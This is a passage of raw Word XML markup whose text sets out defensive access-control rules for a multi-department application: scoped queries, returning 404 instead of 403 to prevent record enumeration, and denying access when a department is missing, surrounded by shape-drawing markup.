          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> would be switched off by anyone writing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>withoutGlobalScopes</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without understanding why it was there. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>visibleTo</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is </w:t>
      </w:r>
      <w:r w:rsidR="00E868FD" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>greppable the</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scoped call sites can be listed, and anything </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unscoped</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is visible by its absence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A426A6D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="170"/>
        <w:ind w:left="312" w:right="16" w:hanging="208"/>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2EE208A7" wp14:editId="3072C390">
                <wp:extent cx="38100" cy="38100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="25907" name="Group 25907"/>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928" name="Shape 928"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="38100" cy="38100"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="38100" h="38100">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="21576" y="0"/>
                                  <a:pt x="24006" y="484"/>
                                  <a:pt x="26340" y="1451"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="28674" y="2418"/>
                                  <a:pt x="30734" y="3795"/>
                                  <a:pt x="32520" y="5581"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34307" y="7367"/>
                                  <a:pt x="35683" y="9426"/>
                                  <a:pt x="36650" y="11757"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="37617" y="14089"/>
                                  <a:pt x="38100" y="16520"/>
                                  <a:pt x="38100" y="19050"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="38100" y="21580"/>
                                  <a:pt x="37617" y="24005"/>
                                  <a:pt x="36650" y="26336"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="35683" y="28668"/>
                                  <a:pt x="34307" y="30733"/>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68"/>
                                  <a:pt x="1450" y="26336"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="483" y="24005"/>
                                  <a:pt x="0" y="21580"/>
                                  <a:pt x="0" y="19050"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="16520"/>
                                  <a:pt x="483" y="14089"/>
                                  <a:pt x="1450" y="11757"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9426"/>
                                  <a:pt x="3793" y="7367"/>
                                  <a:pt x="5580" y="5581"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7366" y="3795"/>
                                  <a:pt x="9426" y="2418"/>
                                  <a:pt x="11760" y="1451"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14094" y="484"/>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g:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="36D21740" id="Group 25907" o:spid="_x0000_s1026" style="width:3pt;height:3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line"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&#10;">
                <v:shape id="Shape 928"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ozwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P9j+EJ+w2UztwsxpFBoNdJui2g7dH82xim5eSZLb+9+Yg7Pjx/V5tRteJC4VoPSuYTQsQxLXX&#10;lhsFP98fz28gYkLW2HkmBVeKsFk/Pqyw0n7gPV0OqRE5hGOFCkxKfSVlrA05jFPfE2fu5IPDlGFo&#10;pA445HDXybIo5tKh5dxgsKd3Q3V7+HMKdjMr2za8bBtTfu3Odtgff19HpZ4m43YJItGY/sV396dW&#10;sCjz2nwmHwG5vgEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDLWbozwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m19050,v2526,,4956,484,7290,1451c28674,2418,30734,3795,32520,5581v1787,1786,3163,3845,4130,6176c37617,14089,38100,16520,38100,19050v,2530,-483,4955,-1450,7286c35683,28668,34307,30733,32520,32519v-1786,1786,-3846,3163,-6180,4130c24006,37616,21576,38100,19050,38100v-2526,,-4956,-484,-7290,-1451c9426,35682,7366,34305,5580,32519,3793,30733,2417,28668,1450,26336,483,24005,,21580,,19050,,16520,483,14089,1450,11757,2417,9426,3793,7367,5580,5581,7366,3795,9426,2418,11760,1451,14094,484,16524,,19050,xe" fillcolor="#152235" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,38100,38100"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 404, not 403.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A 403 confirms the record exists, letting an attacker enumerate ids and map another branch's data volumes without reading a field. "Not found" and "not yours" must be indistinguishable from outside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F9AE71" w14:textId="21320D59"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6896" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DC548F0" wp14:editId="548BE44F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3723382</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19004</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1209675" cy="571500"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25908" name="Group 25908"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1209675" cy="571500"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1209675" cy="571500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="937" name="Shape 937"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="400050" y="0"/>
                            <a:ext cx="809625" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808694" y="4651"/>
                                  <a:pt x="809624" y="6896"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809624" y="126454"/>
                                  <a:pt x="808694" y="128699"/>
                                  <a:pt x="806835" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="132420"/>
                                  <a:pt x="802730" y="133350"/>
                                  <a:pt x="800100"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947" name="Shape 947"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="438150"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4645"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126454"/>
                                  <a:pt x="284820" y="128699"/>
                                  <a:pt x="282960" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132420"/>
                                  <a:pt x="278855" y="133350"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>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40177EF" id="Group 25908" o:spid="_x0000_s1026" style="position:absolute;margin-left:293.2pt;margin-top:-1.5pt;width:95.25pt;height:45pt;z-index:-251459584" coordsize="1209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&#10;cmV2LnhtbFBLBQYAAAAABAAEAPMAAADDBwAAAAA=&#10;">
                <v:shape id="Shape 937" o:spid="_x0000_s1027" style="position:absolute;left:4000;width:8096;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8096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iLxgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6kZbao2uEgMtgZ5MLfX4yD6zwezbkN1q7K/vFgoeh5n5hlltBtuKM/W+caxgOklA&#10;EFdON1wr2H+8PryA8AFZY+uYFFzJw2Y9ulthqt2Fd3QuQy0ihH2KCkwIXSqlrwxZ9BPXEUfv6HqL&#10;Icq+lrrHS4TbVs6S5FlabDguGOwoN1Sdym+r4OnHvL8d8mL/6b6KUl/zjOw2U+p+PGRLEIGGcAv/&#10;twutYPE4h78z8QjI9S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAGJnIi8YAAADcAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l800100,v2630,,4875,930,6735,2791c808694,4651,809624,6896,809625,9525r,114300c809624,126454,808694,128699,806835,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,809625,133350"/>
                </v:shape>
                <v:shape id="Shape 947" o:spid="_x0000_s1028" style="position:absolute;top:4381;width:2857;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="285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yGIxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvgt9heUJvummVqtFVilBqD4rxz/2RfSah2bdhd2vit+8KBY/DzPyGWa47U4sbOV9ZVvA6SkAQ&#10;51ZXXCg4nz6HMxA+IGusLZOCO3lYr/q9JabatpzR7RgKESHsU1RQhtCkUvq8JIN+ZBvi6F2tMxii&#10;dIXUDtsIN7V8S5J3abDiuFBiQ5uS8p/jr1Gg22Icvtz+wpk+f+939f0w1hulXgbdxwJEoC48w//t&#10;rVYwn0zhcSYeAbn6AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhALjDIYjEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l276225,v2630,,4875,930,6735,2784c284820,4645,285750,6890,285750,9525r,114300c285750,126454,284820,128699,282960,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A user with </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> department sees </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nothing</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, not everything treating a missing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>department_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as "all departments" would turn a data-entry omission into a privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5EC89"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7920" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15C28704" wp14:editId="62C24F89">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1675507</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-10350</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="457200" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25909" name="Group 25909"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="457200" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="457200" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="943" name="Shape 943"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="457200" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
